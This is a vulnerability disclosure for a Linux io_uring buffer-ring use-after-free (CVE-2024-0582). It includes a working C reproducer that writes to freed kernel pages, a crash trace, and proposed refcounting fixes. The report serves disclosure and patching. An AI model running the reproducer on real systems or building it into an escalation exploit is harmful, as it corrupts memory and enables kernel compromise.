## https://sploitus.com/exploit?id=PACKETSTORM:189864
Since commit c56e022c0a27 ("io_uring: add support for user mapped provided buffer ring"), which landed in Linux 6.4, io_uring makes it possible to allocate, mmap, and deallocate "buffer rings".
    
    A "buffer ring" can be allocated with io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...). It can be mapped into userspace using mmap() with offset IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM subsystem will treat the mapping as a set of opaque page frame numbers not associated with any corresponding pages; this implies that the calling code is responsible for ensuring that the mapped memory can not be freed before the userspace mapping is removed.
    
However, there is no mechanism in io_uring to ensure this: it is possible to simply register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving freed pages mapped into userspace, which is a fairly easily exploitable situation.
    
Reproducer:
    
    #define _GNU_SOURCE
    #include <unistd.h>
    #include <err.h>
    #include <string.h>
    #include <stdio.h>
    #include <ctype.h>
    #include <sys/syscall.h>
    #include <sys/mman.h>
    #include <linux/io_uring.h>

    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })

    int main(void) {
      struct io_uring_params params = {
        .flags = IORING_SETUP_NO_SQARRAY
      };
      int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
      printf("uring_fd = %d\n", uring_fd);

      /* register a kernel-allocated buffer ring (IOU_PBUF_RING_MMAP) */
      struct io_uring_buf_reg reg = {
        .ring_entries = 1,
        .bgid = 0,
        .flags = IOU_PBUF_RING_MMAP
      };
      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));

      /* map the buffer ring into userspace (creates a VM_PFNMAP mapping) */
      void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
      printf("pbuf mapped at %p\n", pbuf_mapping);

      /* free the ring's pages while the userspace mapping still exists */
      struct io_uring_buf_reg unreg = { .bgid = 0 };
      SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));

      /* keep scribbling over the freed (and possibly reallocated) pages */
      while (1) {
        memset(pbuf_mapping, 0xaa, 0x1000);
        usleep(100000);
      }
    }
    
When run on a system with the following debug options enabled:

    CONFIG_PAGE_TABLE_CHECK=y
    CONFIG_PAGE_TABLE_CHECK_ENFORCED=y

this splats with the error below when __page_table_check_zero() detects that a page that is being freed is still mapped into userspace:
    
    ------------[ cut here ]------------  
    kernel BUG at mm/page_table_check.c:146!  
    invalid opcode: 0000 [#1] PREEMPT SMP KASAN  
    CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360  
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014  
    RIP: 0010:__page_table_check_zero+0x136/0x150  
    Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff  
    RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202  
    RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000  
    RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4  
    RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e  
    R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000  
    R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000  
    FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000  
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
    CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0  
    PKRU: 55555554  
    Call Trace:  
     <TASK>  
    [...]  
     free_unref_page_prepare+0x282/0x450  
     free_unref_page+0x45/0x170  
     __io_remove_buffers.part.0+0x38c/0x3c0  
     io_unregister_pbuf_ring+0x146/0x1e0  
    [...]  
     __do_sys_io_uring_register+0xa03/0x11c0  
    [...]  
     do_syscall_64+0x43/0xf0  
     entry_SYSCALL_64_after_hwframe+0x6e/0x76  
    RIP: 0033:0x7f745ef4bf59  
    Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48  
    RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab  
    RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59  
    RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003  
    RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000  
    R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0  
    R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000  
     </TASK>  
    Modules linked in:  
    ---[ end trace 0000000000000000 ]---  
    
When run on a system without those options, this reproducer will randomly corrupt memory and will probably crash the machine on most runs. When I tried it once and afterwards used some other programs, I got a random kernel #GP fault.
    
One way to fix this might be to add a mapping counter to struct io_buffer_list, and then:

- increment that counter in io_uring_validate_mmap_request() for PBUF_RING mappings
- increment that counter in the vm_area_operations ->open() handler
- decrement that counter in the vm_area_operations ->close() handler
- refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?

Or alternatively let the counter start at 1 and free the io_buffer_list when the counter drops to zero.
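
As a rough illustration of that second variant, here is a minimal userspace model of the intended lifetime rule. This is not kernel code, and everything except the io_buffer_list concept itself is invented for the sketch:

    /* Userspace model of the proposed refcounting; all names are hypothetical. */
    #include <stdio.h>
    #include <stdlib.h>

    struct io_buffer_list_model {
        int refs;       /* starts at 1, held by the registration itself */
        void *ring_mem; /* stands in for the pages backing the buffer ring */
    };

    static struct io_buffer_list_model *bl_register(void) {
        struct io_buffer_list_model *bl = calloc(1, sizeof(*bl));
        bl->refs = 1;                  /* reference taken by IORING_REGISTER_PBUF_RING */
        bl->ring_mem = malloc(0x1000); /* "pages" backing the ring */
        return bl;
    }

    static void bl_put(struct io_buffer_list_model *bl) {
        if (--bl->refs == 0) {         /* free only once nothing maps the ring anymore */
            free(bl->ring_mem);
            free(bl);
        }
    }

    /* mmap() / vm_ops->open() would take a reference... */
    static void bl_mmap(struct io_buffer_list_model *bl)   { bl->refs++; }
    /* ...and vm_ops->close() would drop it again. */
    static void bl_munmap(struct io_buffer_list_model *bl) { bl_put(bl); }

    int main(void) {
        struct io_buffer_list_model *bl = bl_register();
        bl_mmap(bl);   /* userspace maps the ring: refs == 2 */
        bl_put(bl);    /* IORING_UNREGISTER_PBUF_RING: refs == 1, memory survives */
        bl_munmap(bl); /* munmap(): refs == 0, memory is freed only now */
        puts("ring memory outlived the unregister, as intended");
        return 0;
    }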
    
(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's memory are: it looks like most paths only access the io_buffer_list under some lock? Is the idea that the kernel actually accesses the buffer through userspace pointers, or something like that? I'll have to stare at this some more before I understand it...)
    
This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-02-26.
    
    
Related CVE Number: CVE-2024-0582

Credit: Jann Horn